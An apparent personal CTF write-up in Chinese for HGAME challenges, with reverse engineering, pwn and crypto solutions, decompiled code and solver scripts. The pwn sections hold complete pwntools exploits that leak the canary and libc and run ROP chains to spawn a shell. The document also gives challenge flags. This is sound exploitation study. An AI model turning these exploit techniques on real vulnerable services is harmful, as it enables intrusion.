    *((_QWORD *)&v11 + 1) = 69i64;
    v15 = v11;
    v16 = v12;
    v17 = v13;
    v18 = v14;
    if ( qword_140005180(0i64, &v17, &v15, &qword_140005190) )
    {
      sub_140001020("%s", (const char *)qword_140005190);
    }
    else
    {
      puts("ApplyDelta Error");
      LastError = GetLastError();
      RaiseException(LastError, 1u, 0, 0i64);
    }
    puts("Seven eats the hash and causes the program to appear to have some kind of error.");
    puts("Seven wants to make up for the mistake, so she's giving you a chance to patch the hash.");
    sub_140001020("input your MD5:");
    sub_140001080("%32s");
    v5 = Buffer;
    v6 = (char *)&unk_1400050B4;
    v7 = 16i64;
    do
    {
      sub_1400010E0(v5, "%02x");
      ++v6;
      v5 += 2;
      --v7;
    }
    while ( v7 );
    word_1400050C4 = 31233;
    v17 = v11;
    v18 = v12;
    v15 = v13;
    v16 = v14;
    if ( !qword_140005180(0i64, &v15, &v17, &qword_140005190) )
    {
      puts("You didn't take advantage of this opportunity.");
      sub_1400014E0();
      exit(0);
    }
    v8 = 0;
    v9 = 0i64;
    do
    {
      if ( byte_140003438[v9] != ((unsigned __int8)Str1[v9] ^ *(_BYTE *)(v8 % (unsigned __int64)qword_140005198
                                                                       + qword_140005190)) )
      {
        puts("Flag is error!!");
        sub_1400014E0();
        exit(0);
      }
      ++v8;
      ++v9;
    }
    while ( v8 < 43 );
  }
  puts(aGreat);
  DeltaFree((LPVOID)qword_140005190);
  FreeLibrary(hLibModule);
  return 0;
}

参考Windows差异化补丁MSDelta之研究 | Ikoct的饮冰室

打补丁这个方法没理解，好像是大概hash被修改了，我们以补丁方式将其改成正确的hash?

看了官解才发现自己忽略了一个至关重要的地方，或者说根本没理解代码，下次注意

程序给了我们一次回填被修改的hash的机会
程序会拿增量之后的内容加密flag，比较密文。
只需要根据从内存中找到的内容，计算一下md5回填回去

我之前想动调找hash根本没有调到这里，自然不会找到hash

填入MD5后

为很么要找seven呢?

因为后面的异或逻辑我们知道key的前几个肯定是Seven，所以可以根据这个找

我觉得这题主要是动调吧，调了很久

A = 'hgame{' + 'a'*36+ '}'
print(A)

enc = [0x3B, 0x02, 0x17, 0x08, 0x0B, 0x5B, 0x4A, 0x52, 0x4D, 0x11,
            0x11, 0x4B, 0x5C, 0x43, 0x0A, 0x13, 0x54, 0x12, 0x46, 0x44,
            0x53, 0x59, 0x41, 0x11, 0x0C, 0x18, 0x17, 0x37, 0x30, 0x48,
            0x15, 0x07, 0x5A, 0x46, 0x15, 0x54, 0x1B, 0x10, 0x43, 0x40,
            0x5F, 0x45, 0x5A]

key = [0x53, 0x65, 0x76, 0x65, 0x6E, 0x20, 0x73, 0x61, 0x79, 0x73,
            0x20, 0x79, 0x6F, 0x75, 0x27, 0x72, 0x65, 0x20, 0x72, 0x69,
            0x67, 0x68, 0x74, 0x21, 0x21, 0x21, 0x21, 0x00]

for i in range(43):
    print(chr(enc[i] ^ key[i % 28]),end='')

尊嘟假嘟[复现]

jadx打开

在Toast发现check，DexCall发现加载了check和dex，GPT说这个类是漏洞点

声明 native 方法 copyDexFromAssets，用于从 APK assets 中复制 DEX 文件到缓存目录。

利用 DexClassLoader 加载复制后的 DEX 文件，反射调用指定类和方法，并传入一个参数。

调用结束后删除 DEX 文件，防止残留。

这里其实方法有很多

1. frida hook loadDexFile通杀动态加载dex

2. 修改smali，不让dex删除

3. 分析so算法，进行解密

4. 内存dump

到这留着，安卓还不太会，回头有空再搞

signin

下断点得到的key是错的，软件断点的原理是用一条软件断点指令替代断点地址所在位置的操作码字节

因为有反调试,能发现下面部分

qword_1400BB880即为delta，Dr寄存器是调试寄存器，储存硬件断点，也就是说delta为0时才是正常状态

多按几次d就行了

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#define delta 0
#define DELTA 0
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))

void btea(uint32_t* v, int n, uint32_t const key[4])
{
    uint32_t y, z, sum;
    unsigned p, rounds, e;
    if (n > 1) {
        rounds = 11;
        sum = 0;
        z = v[n - 1];
        do
        {
            sum += DELTA;
            e = (sum >> 2) & 3;
            for (p = 0; p < n - 1; p++)
            {
                y = v[p + 1];
                z = v[p] += MX;
            }
            y = v[0];
            z = v[n - 1] += MX;
        } while (--rounds);
    }
    else if (n < -1) {
        n = -n;
        rounds = 11;
        sum = rounds * DELTA;
        y = v[0];
        do
        {
            e = (sum >> 2) & 3;
            for (p = n - 1; p > 0; p--)
            {
                z = v[p - 1];
                y = v[p] -= MX;
            }
            z = v[n - 1];
            y = v[0] -= MX;
            sum -= DELTA;
        } while (--rounds);
    }
}



int main()
{
    unsigned int v[] = { 0x3050EA23, 0x47514C00, 0x2B769CEE, 0x1794E6D5, 0xB3E42BED, 0x61D536CB, 0x7CA0C2C0, 0x5ED767FE,
        0xC579E0AF };
    unsigned int key[4] = { 0x97A25FB5, 0xE1756DBA, 0xA143464A, 0x5A8F284F };

    btea(v, -9, key);
    for (int i = 0; i < 9; i++) printf("%c%c%c%c", *((char*)&v[i] + 0), *((char*)&v[i] + 1), *((char*)&v[i] + 2), *((char*)&v[i] + 3));
    // printf("%s",v);
    return 0;
}

3fe4722c-1dbf-43b7-8659-c1c4a0e42e4d

PWN

counting petals

int __fastcall main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-A4h]
  int v5; // [rsp+10h] [rbp-A0h]
  int v6; // [rsp+14h] [rbp-9Ch]
  __int64 v7[17]; // [rsp+18h] [rbp-98h] BYREF
  int v8; // [rsp+A0h] [rbp-10h] BYREF
  int v9; // [rsp+A4h] [rbp-Ch]
  unsigned __int64 v10; // [rsp+A8h] [rbp-8h]

  v10 = __readfsqword(0x28u);
  init(argc, argv, envp);
  v4 = 0;
  while ( 1 )
  {
    v5 = 0;
    v6 = rand() % 30;
    v9 = 0;
    puts("\nAs we know,there's a tradition to determine whether someone loves you or not...");
    puts("... by counting flower petals when u are not sure.");
    puts("\nHow many flowers have you prepared this time?");
    __isoc99_scanf("%d", &v8);
    if ( v8 > 16 )
    {
      puts("\nNo matter how many flowers there are, they cannot change the fact of whether he or she loves you.");
      puts("Just a few flowers will reveal the answer,love fool.");
      exit(0);
    }
    puts("\nTell me the number of petals in each flower.");
    while ( v9 < v8 )
    {
      printf("the flower number %d : ", (unsigned int)++v9);
      __isoc99_scanf("%ld", &v7[v9 + 1]);
    }
    puts("\nDo you want to start with 'love me'");
    puts("...or 'not love me'?");
    puts("Reply 1 indicates the former and 2 indicates the latter: ");
    __isoc99_scanf("%ld", v7);
    puts("\nSometimes timing is important, so I added a little bit of randomness.");
    puts("\nLet's look at the results.");
    while ( v5 < v8 )
    {
      printf("%ld + ", v7[++v5 + 1]);
      v7[0] += v7[v5 + 1];
    }
    printf("%d", (unsigned int)v6);
    v7[0] += v6;
    puts(" = ");
    if ( (v7[0] & 1) == 0 )
      break;
    puts("He or she doesn't love you.");
    if ( v4 > 0 )
      return 0;
    ++v4;
    puts("What a pity!");
    puts("I can give you just ONE more chance.");
    puts("Wish that this time they love you.");
  }
  puts("Congratulations,he or she loves you.");
  return 0;
}

下面那个似乎有点怪，1的时候却是填在2中，看看能不能覆盖什么，调试下看吧

printf("the flower number %d : ", (unsigned int)++v9);
__isoc99_scanf("%ld", &v7[v9 + 1]);

第一次输入2

输入3

这么看的话输入16能覆盖到0xf

但是发现直接覆盖会重复执行循环

发现如下

0xb00000010

B是v9，010是输入的16也就是v9和v8是在相近的地址上，不能直接覆盖

需要泄露PIE地址,canary的话那么看到ld发现我们可以输入一个大数被转化成16进制

如64424509455被转为0xe0000000f

那么就能多泄露几个(靠下面的+print出来)

Canary

0x5752a16272660200

我设置了：0x1100000011

from pwn import *
import struct

context(os='linux', arch='amd64', log_level='debug')

LOCAL = True
libc = ELF("./libc.so.6")
elf = ELF("./vuln")
if LOCAL:
    io = process("./vuln")
else:
    io = remote("node1.hgame.vidar.club", 32226)

io.sendlineafter(b" time?", b"16")

for i in range(15):
    io.sendlineafter(b"the flower number", b"0")

io.sendlineafter(b"the flower number", str(94489280534))

io.sendlineafter(b"latter:", b"2")

# 解析输出泄露Canary
io.recvuntil(b"the results.")
output = io.recvuntil(b" = \n").split(b' + ')
canary = int(output[-7])  
ret_addr = int(output[-5])  
main_pie_addr = int(output[-3])  

log.success(f"Canary: {hex(canary)}")
log.success(f"ret_addr: {hex(ret_addr)}")
log.success(f"main_pie_addr: {hex(main_pie_addr)}")

pie_base = main_pie_addr - 0x12BF  # 替换为实际偏移
log.success(f"PIE Base: {hex(pie_base)}")

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

log.success(f"puts_plt: {hex(puts_plt)}")
log.success(f"puts_got: {hex(puts_got)}")

pop_rdi_ret = pie_base + 0x2a3e5      # 例如: "pop rdi; ret" 的偏移
puts_plt    = pie_base + puts_plt       # binary 的 puts@plt 地址
puts_got    = pie_base + puts_got      # binary 的 puts@got 地址
main_addr   = pie_base + 0x12BF        # main 的实际地址

rop = flat([
    pop_rdi_ret,
    puts_got,
    puts_plt,
    main_addr
])

的确泄露了，那么问题来了如何执行呢我们的代码呢??rop根本无法执行，我们输入不了那么多

学到了，不要一味的写，先把问题考虑清楚再开始做

后来想到我们不用控制v9，我们只要输入比如1000，他后面就能溢出了(当然原来的方法仍然可用于泄露，但是执行就不适用了)

直接贴exp

from pwn import *
import struct

context(os='linux', arch='amd64', log_level='debug')

LOCAL = True
libc = ELF("./libc.so.6")
elf = ELF("./vuln")
if LOCAL:
    io = process("./vuln")
else:
    io = remote("node1.hgame.vidar.club", 32226)

io.sendlineafter(b" time?", b"16")

for i in range(15):
    io.sendlineafter(b"the flower number", b"0")

io.sendlineafter(b"the flower number", str(94489280534))
io.sendlineafter(b"latter:", b"2")

# 解析输出泄露Canary
io.recvuntil(b"the results.")
output = io.recvuntil(b" = \n").split(b' + ')
canary = int(output[-7])  
ret_addr = int(output[-5])  
main_pie_addr = int(output[-3])  

libc_base = ret_addr - libc.sym['__libc_start_main'] - 128 + 176

log.success(f"Canary: {hex(canary)}")
log.success(f"ret_addr: {hex(ret_addr)}")
log.success(f"main_pie_addr: {hex(main_pie_addr)}")
log.success(f"libc_base: {hex(libc_base)}")

system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
pop_rdi = libc_base + libc.search(asm("pop rdi\nret")).__next__()
ret = libc_base + 0x29139

io.sendlineafter(b" time?", b"16")

for i in range(15):
    io.sendlineafter(b"the flower number", b"0")

io.sendlineafter(b"the flower number", b'24')
for i in range(18):
    io.sendlineafter(b"the flower number", b"+")

def check(data):
    return str(data - (1 << 48)) if data > 0x7FFFFFFFFFFF else str(data)

io.sendlineafter(b"the flower number", check(ret))
io.sendlineafter(b"the flower number", check(pop_rdi))
io.sendlineafter(b"the flower number", check(binsh))
io.sendlineafter(b"the flower number", check(system))

for i in range(2):
    io.sendlineafter(b"the flower number", b"+")

io.sendlineafter(b"latter:", b"+")
io.interactive()

check防止溢出，check_value 函数的作用是 绕过符号扩展问题，确保输入的地址值被漏洞程序正确解析为无符号的 64 位地址。+号是专门针对scanf，来跳过的。moectf好像有个差不多的学到的

libc_base = ret_addr - libc.sym[‘__libc_start_main’] - 128 + 176怎么来的?

调试无意间发现，差176

ezstack

int __fastcall __noreturn main(int argc, const char **argv, const char **envp){
  socklen_t addr_len; // [rsp+Ch] [rbp-44h] BYREF
  struct sockaddr addr; // [rsp+10h] [rbp-40h] BYREF
  int optval; // [rsp+2Ch] [rbp-24h] BYREF
  struct sockaddr s; // [rsp+30h] [rbp-20h] BYREF
  __pid_t v7; // [rsp+44h] [rbp-Ch]
  int v8; // [rsp+48h] [rbp-8h]
  int fd; // [rsp+4Ch] [rbp-4h]

  signal(17, (__sighandler_t)1);
  fd = socket(2, 1, 6);
  if ( fd < 0 ){
    perror("socket error");
    exit(1);
  }
  memset(&s, 0, sizeof(s));
  s.sa_family = 2;
  *(_WORD *)s.sa_data = htons(0x270Fu);
  *(_DWORD *)&s.sa_data[2] = htonl(0);
  optval = 1;
  if ( setsockopt(fd, 1, 2, &optval, 4u) < 0 ){
    perror("setsockopt error");
    exit(1);
  }
  if ( bind(fd, &s, 0x10u) < 0 ){
    perror("bind error");
    exit(1);
  }
  if ( listen(fd, 10) < 0 ){
    perror("listen error");
    exit(1);
  }
  addr_len = 16;
  while ( 1 ){
    v8 = accept(fd, &addr, &addr_len);
    if ( v8 < 0 )
      break;
    v7 = fork();
    if ( v7 == -1 ){
      perror("fork error");
      exit(1);
    }
    if ( !v7 ){
      handler(v8);
      close(v8);
      exit(0);
    }
    close(v8);
  }
  perror("accept error");
  exit(1);
}

可溢出

其实这题就是栈迁移+orw，但是对于新手来说这题不一样的就是通信方式和给了个Dockerfile，容易让人迷惑

我们执行以下命令：

docker build -t pwn_vuln .
docker run -p 9999:9999 -p 1234:1234 --name my_pwn_container -d my_pwn
docker exec -it my_pwn

即可

libc版本：

这题麻烦在调试上，不太会这样的调试，参考Linux 多进程程序调试实例(一) –GDB调试fork函数 - 王清河 - 博客园

format

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char format[4]; // [rsp+0h] [rbp-10h] BYREF
  unsigned int v5; // [rsp+4h] [rbp-Ch] BYREF
  int v6; // [rsp+8h] [rbp-8h] BYREF
  int i; // [rsp+Ch] [rbp-4h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  printf("you have n chance to getshell\n n = ");
  if ( (int)__isoc99_scanf("%d", &v6) <= 0 )
    exit(1);
  for ( i = 0; i < v6; ++i )
  {
    printf("type something:");
    if ( (int)__isoc99_scanf("%3s", format) <= 0 )
      exit(1);
    printf("you type: ");
    printf(format);
  }
  printf("you have n space to getshell(n<5)\n n = ");
  __isoc99_scanf("%d\n", &v5);
  if ( (int)v5 <= 5 )
    vuln(v5);
  return 0;
}

注意这里是int v5而上面是uint类型。

只能输入三个字符，那我们直接%p泄露个栈地址

打印出0x7fffffffb430

如果后面要泄露什么操作的话，可以通过这个地址进行计算

进入到vuln函数

d540-b430=8464

vuln中没有相应gadgets,但是libc.so中有，要利用需要libc_base，所以得到rbp后我们不能直接去泄露，因为不知道libc_base，想想其他方法。而且我们没有%p来泄露

我们可以通过_libc_start_main来泄露libc_base，注意还有128这些跟counting petals差不多，128+29DC0 = 29E40

迁移前的栈：原Rbp是0x7ffca7f4c850

迁移完的栈：

from pwn import *
import struct

context(os='linux', arch='amd64', log_level='debug')

LOCAL = True
libc = ELF("./libc.so.6")
elf = ELF("./vuln")
if LOCAL:
    io = process("./vuln")
else:
    io = remote("node1.hgame.vidar.club", 31045)

ret_addr = 0x401333
printf = 0x4012CF
read = 0x4011D9

io.sendlineafter('n = ', b'1') 
io.sendlineafter('type something:', '%p')

io.recvuntil("you type: ")
stack_addr = int(io.recv(14), 16)
print("stack_addr--->>>",hex(stack_addr))

io.sendlineafter('n = ', b'-55555555')
rbp = stack_addr + 8464
print("rbp_addr--->>>",hex(rbp))

payload = b"a"*5 + p64(rbp + 0x60) + p64(read)
io.sendline(payload)
sleep(1)

payload = b"a"*4 + p64(rbp + 0x90) + p64(printf) + p64(0) * 2 + b"%17$p\xbc\x23\x84" + p64(0) + p64(rbp) + p64(0x4011F0)
io.sendline(payload)

io.recvuntil("type something:")
libc_base = int(io.recv(14), 16) - 0x29E40
rdi_addr = libc_base + libc.search(asm("pop rdi\nret")).__next__()
system_addr = libc_base + libc.sym['system']
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))

payload =  b"a" * 4 + p64(ret_addr) + p64(0x4011EF) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
io.sendline(payload)

io.interactive()

调试发现还需要栈平衡

CRYPTO

ezBag

DeepSeek速通

在线 SAGE 计算：SageMathCell

# SageMath代码
list=[[2826962231, 3385780583, 3492076631, 3387360133, 2955228863, 2289302839, 2243420737, 4129435549, 4249730059, 3553886213, 3506411549, 3658342997, 3701237861, 4279828309, 2791229339, 4234587439, 3870221273, 2989000187, 2638446521, 3589355327, 3480013811, 3581260537, 2347978027, 3160283047, 2416622491, 2349924443, 3505689469, 2641360481, 3832581799, 2977968451, 4014818999, 3989322037, 4129732829, 2339590901, 2342044303, 3001936603, 2280479471, 3957883273, 3883572877, 3337404269, 2665725899, 3705443933, 2588458577, 4003429009, 2251498177, 2781146657, 2654566039, 2426941147, 2266273523, 3210546259, 4225393481, 2304357101, 2707182253, 2552285221, 2337482071, 3096745679, 2391352387, 2437693507, 3004289807, 3857153537, 3278380013, 3953239151, 3486836107, 4053147071], [2241199309, 3658417261, 3032816659, 3069112363, 4279647403, 3244237531, 2683855087, 2980525657, 3519354793, 3290544091, 2939387147, 3669562427, 2985644621, 2961261073, 2403815549, 3737348917, 2672190887, 2363609431, 3342906361, 3298900981, 3874372373, 4287595129, 2154181787, 3475235893, 2223142793, 2871366073, 3443274743, 3162062369, 2260958543, 3814269959, 2429223151, 3363270901, 2623150861, 2424081661, 2533866931, 4087230569, 2937330469, 3846105271, 3805499729, 4188683131, 2804029297, 2707569353, 4099160981, 3491097719, 3917272979, 2888646377, 3277908071, 2892072971, 2817846821, 2453222423, 3023690689, 3533440091, 3737441353, 3941979749, 2903000761, 3845768239, 2986446259, 3630291517, 3494430073, 2199813137, 2199875113, 3794307871, 2249222681, 2797072793], [4263404657, 3176466407, 3364259291, 4201329877, 3092993861, 2771210963, 3662055773, 3124386037, 2719229677, 3049601453, 2441740487, 3404893109, 3327463897, 3742132553, 2833749769, 2661740833, 3676735241, 2612560213, 3863890813, 3792138377, 3317100499, 2967600989, 2256580343, 2471417173, 2855972923, 2335151887, 3942865523, 2521523309, 3183574087, 2956241693, 2969535607, 2867142053, 2792698229, 3058509043, 3359416111, 3375802039, 2859136043, 3453019013, 3817650721, 2357302273, 3522135839, 2997389687, 3344465713, 2223415097, 2327459153, 3383532121, 3960285331, 3287780827, 4227379109, 3679756219, 2501304959, 4184540251, 3918238627, 3253307467, 3543627671, 3975361669, 3910013423, 3283337633, 2796578957, 2724872291, 2876476727, 4095420767, 3011805113, 2620098961], [2844773681, 3852689429, 4187117513, 3608448149, 2782221329, 4100198897, 3705084667, 2753126641, 3477472717, 3202664393, 3422548799, 3078632299, 3685474021, 3707208223, 2626532549, 3444664807, 4207188437, 3422586733, 2573008943, 2992551343, 3465105079, 4260210347, 3108329821, 3488033819, 4092543859, 4184505881, 3742701763, 3957436129, 4275123371, 3307261673, 2871806527, 3307283633, 2813167853, 2319911773, 3454612333, 4199830417, 3309047869, 2506520867, 3260706133, 2969837513, 4056392609, 3819612583, 3520501211, 2949984967, 4234928149, 2690359687, 3052841873, 4196264491, 3493099081, 3774594497, 4283835373, 2753384371, 2215041107, 4054564757, 4074850229, 2936529709, 2399732833, 3078232933, 2922467927, 3832061581, 3871240591, 3526620683, 2304071411, 3679560821]]
bag=[123342809734, 118191282440, 119799979406, 128273451872]

# 构造四个方程的行
rows = []
for i in range(4):
    a = list[i]
    b = bag[i]
    row = a + [-b]
    rows.append(row)

A = Matrix(ZZ, rows)
K = A.right_kernel()
B = K.basis_matrix()

# 应用LLL算法
L = B.LLL()

found = False
p = 0
for row in L:
    if row[-1] not in [1, -1]:
        continue
    x = (row / row[-1]).list()[:-1]  # 归一化并取出前64位
    valid = all(bit in (0, 1) for bit in x)
    if valid:
        p = sum(bit * (1 << i) for i, bit in enumerate(x))
        print(f"Found p: {p}")
        found = True
        break

if not found:
    print("No solution found.")

17739748707559623655

from Crypto.Cipher import AES
import hashlib
from Crypto.Util.Padding import unpad

# 恢复的p值
p = 17739748707559623655  # 替换为实际找到的p

# 生成密钥
key = hashlib.sha256(str(p).encode()).digest()

# 解密
ciphertext = b'\x1d6\xcc}\x07\xfa7G\xbd\x01\xf0P4^Q"\x85\x9f\xac\x98\x8f#\xb2\x12\xf4+\x05`\x80\x1a\xfa !\x9b\xa5\xc7g\xa8b\x89\x93\x1e\xedz\xd2M;\xa2'
cipher = AES.new(key, AES.MODE_ECB)
plaintext = cipher.decrypt(ciphertext)
flag = unpad(plaintext, 16)
print(flag.decode())

hgame{A_S1mple_Modul@r_Subset_Sum_Problem}

sieve

GPT速通，提示词：题目是sieve，题目描述：两种不同孔径的筛子，才能筛干净。给我实际的解题代码，不要伪代码

import sys

# 为防止递归层数不足，可适当提高递归限制
sys.setrecursionlimit(10000)

from sympy import primepi, nextprime
from Crypto.Util.number import long_to_bytes, inverse


def summatory_phi(n, cache={}):
    """
    快速计算 ∑_{i=1}^{n} φ(i)
    利用公式：
         F(n) = n(n+1)/2 - ∑_{i=2}^{n} (j - i + 1) * F(n//i)
    其中对于区间 [i, j] 内 n//i 相同，可以合并求和。
    """
    if n in cache:
        return cache[n]
    # 基础公式：所有数的和 1+2+...+n = n(n+1)//2
    res = n * (n + 1) // 2
    i = 2
    while i <= n:
        # n//i 在区间 [i, j] 内保持不变，令 j = n // (n//i)
        j = n // (n // i)
        res -= (j - i + 1) * summatory_phi(n // i, cache)
        i = j + 1
    cache[n] = res
    return res


def main():
    # 给定的 RSA 公钥指数
    e = 65537
    # N0 = e^2 // 6
    N0 = e ** 2 // 6
    print(f"开始计算 summatory_phi({N0}) ...")
    sum_phi = summatory_phi(N0)
    print("∑φ(i) 计算完毕。")

    # 计算 π(N0)
    pi_N0 = primepi(N0)
    print(f"π({N0}) = {pi_N0}")

    # 根据题目 trick 函数的含义有 T = ∑_{i=1}^{N0} φ(i) + π(N0)
    T = sum_phi + pi_N0
    print(f"T = {T}")

    # 左移 128 位，相当于乘以 2^128，再取下一个质数作为 p
    T_shifted = T << 128
    print("开始计算 p = nextprime(T << 128) ...")
    p = nextprime(T_shifted)
    print("p 找到。")

    # 模数 n = p^2 （注意 p = q）
    n = p * p
    print("n 计算完毕。")

    # 给定的密文
    enc = 2449294097474714136530140099784592732766444481665278038069484466665506153967851063209402336025065476172617376546

    # 对于 n = p^2，有 φ(n) = p*(p-1)
    phi_n = p * (p - 1)
    # 计算 RSA 私钥 d，满足 e*d ≡ 1 (mod φ(n))
    d = inverse(e, phi_n)

    # 解密： m = enc^d mod n
    m = pow(enc, d, n)
    flag = long_to_bytes(m)
    print("FLAG =", flag)


if __name__ == '__main__':
    main()

FLAG = b’hgame{sieve_is_n0t_that_HArd}’